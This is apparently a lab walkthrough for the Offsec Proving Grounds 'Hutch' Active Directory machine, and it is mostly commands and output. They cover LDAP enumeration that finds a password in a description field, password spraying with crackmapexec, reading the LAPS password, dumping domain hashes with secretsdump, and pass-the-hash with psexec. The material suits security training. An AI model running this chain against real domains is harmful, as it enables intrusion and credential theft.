CTF Writeup - Offsec PG Hutch
Table of Contents
Hutch
Enumeration with Nmap
nmap -p- -sC -sV 192.168.175.122 -T4 -oN nmap.out
┌──(root💀kali)-[~/hatch]
└─# nmap -p- -sC -sV 192.168.175.122 -T4 -oN nmap.out
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-25 23:53 EEST
Nmap scan report for 192.168.175.122
Host is up (0.046s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Date: Mon, 25 Sep 2023 20:55:58 GMT
| Server Type: Microsoft-IIS/10.0
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-25 20:55:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49672/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
49874/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-25T20:55:59
|_ start_date: N/A
Webdav is allowed in port 80
LDAP is enabled
Domain name is hutch.offsec
Enumerating LDAP
Let’s search ldap with ldapsearch
ldapsearch -x -b "dc=hutch,dc=offsec" -h 192.168.175.122 > ldap.txt
Command result contains a lot of information.
I grepped the list of account by sAMAccountName.
grep -oP "(?<=sAMAccountName:).*" ldap.txt
Guest
Domain Computers
Cert Publishers
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
DnsAdmins
DnsUpdateProxy
rplacidi
opatry
ltaunton
acostello
jsparwell
oknee
jmckendry
avictoria
jfrarey
eaburrow
cluddy
agitthouse
fmcsorley
I found interesting information in the result. It can be used later for user enumeration.
description: Password set to CrabSharkJellyfish192 at user's request. Please c
hange on next login.
Enumerating Users
Based on the gathered information from ldapsearch, I searched users and corresponding password.
Let’s find users and corresponding password with crackmapexec with smb option
┌──(root💀kali)-[~/hatch]
└─# crackmapexec smb 192.168.175.122 -u ./users.txt -p ./pass.txt --continue-on-success
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
"class": algorithms.Blowfish,
SMB 192.168.175.122 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\Guest:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\Domain Computers:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\Cert Publishers:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\Domain Users:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\Domain Guests:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\Group Policy Creator Owners:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\RAS and IAS Servers:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\Allowed RODC Password Replication Group:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\Denied RODC Password Replication Group:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\Enterprise Read-only Domain Controllers:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\Cloneable Domain Controllers:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\Protected Users:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\DnsAdmins:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\DnsUpdateProxy:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\rplacidi:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\opatry:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\ltaunton:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\acostello:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\jsparwell:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\oknee:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\jmckendry:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\avictoria:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\jfrarey:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\eaburrow:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\cluddy:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [-] hutch.offsec\agitthouse:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB 192.168.175.122 445 HUTCHDC [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192
Now we got the valid username and password: fmcsorley:CrabSharkJellyfish192
With this user info, we can find user list with Impacket GetADUsers.py
┌──(root💀kali)-[~/hatch]
└─# GetADUsers.py -all -dc-ip 192.168.175.122 hutch.offsec/fmcsorley:CrabSharkJellyfish192
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Querying 192.168.175.122 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2023-09-25 23:50:22.722364 2020-11-04 07:58:40.654236
Guest <never> <never>
krbtgt 2020-11-04 07:26:23.099902 <never>
rplacidi 2020-11-04 07:35:05.106274 <never>
opatry 2020-11-04 07:35:05.216273 <never>
ltaunton 2020-11-04 07:35:05.264272 <never>
acostello 2020-11-04 07:35:05.315273 <never>
jsparwell 2020-11-04 07:35:05.377272 <never>
oknee 2020-11-04 07:35:05.433274 <never>
jmckendry 2020-11-04 07:35:05.492273 <never>
avictoria 2020-11-04 07:35:05.545279 <never>
jfrarey 2020-11-04 07:35:05.603273 <never>
eaburrow 2020-11-04 07:35:05.652273 <never>
cluddy 2020-11-04 07:35:05.703274 <never>
agitthouse 2020-11-04 07:35:05.760273 <never>
fmcsorley 2020-11-04 07:35:05.815275 2021-02-16 15:39:34.483491
domainadmin 2021-02-16 07:24:22.190351 2023-09-25 23:47:29.894236
I added Administrator and domainadmin to the users.txt
Finding users with better privilege
crackmapexec ldap laps module let’s you find LAPS info
┌──(root💀kali)-[~/hatch]
└─# crackmapexec ldap 192.168.175.122 -u fmcsorley -p CrabSharkJellyfish192 --kdcHost 192.168.175.122 -M laps
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
"class": algorithms.Blowfish,
LDAP 192.168.175.122 389 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
LDAP 192.168.175.122 389 HUTCHDC [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192
LAPS 192.168.175.122 389 HUTCHDC [*] Getting LAPS Passwords
LAPS 192.168.175.122 389 HUTCHDC Computer: HUTCHDC$ Password: yH{w0s#-B.yV50
Password: yH{w0s#-B.yV50 is added to the password list.
Run the same command: crackmapexec smb 192.168.175.122 -u ./users.txt -p ./pass.txt --continue-on-success
and I got the new result
SMB 192.168.175.122 445 HUTCHDC [+] hutch.offsec\Administrator:yH{w0s#-B.yV50 (Pwn3d!)
Fortunately, this belongs to the Admin.
Let’s get NTLM hash with Impacket script: secretdump.py
┌──(root💀kali)-[~/hatch]
└─# secretsdump.py hutch.offsec/administrator:'yH{w0s#-B.yV50'@192.168.175.122
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xb24173e6ac9aa789ab05a4acceeb27ba
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bab179eba40e413086aa37742476c646:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
.
.
.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:333078b4951591731a68da1d3fb53cdb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3c37d961d2fbbc1eb9e4d09f145ad361:::
hutch.offsec\rplacidi:1103:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\opatry:1104:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\ltaunton:1105:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\acostello:1106:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jsparwell:1107:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\oknee:1108:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jmckendry:1109:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\avictoria:1110:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jfrarey:1111:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\eaburrow:1112:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\cluddy:1113:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\agitthouse:1114:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\fmcsorley:1115:aad3b435b51404eeaad3b435b51404ee:83bcf188adc71adef071303fae29c1c7:::
hutch.offsec\domainadmin:1116:aad3b435b51404eeaad3b435b51404ee:8730fa0d1014eb78c61e3957aa7b93d7:::
HUTCHDC$:1000:aad3b435b51404eeaad3b435b51404ee:151657b4aa87d85cebc0543e9d1f095b:::
Getting the shell
psexec.py Administrator@192.168.175.122 -hashes aad3b435b51404eeaad3b435b51404ee:333078b4951591731a68da1d3fb53cdb
Note
Cracking Windows machines has always been a challenge for me. In this particular case, the LDAP protocol proved to be the key to accessing critical information. I explored Impacket scripts for thorough Active Directory enumeration and gained a solid understanding of psexec.
After successfully rooting nearly 30 machines on the Proving Ground, I can’t shake the feeling that there are still many protocols left to master. I’m committed to continuing my journey and refining my skills until I can confidently navigate any protocol I come across.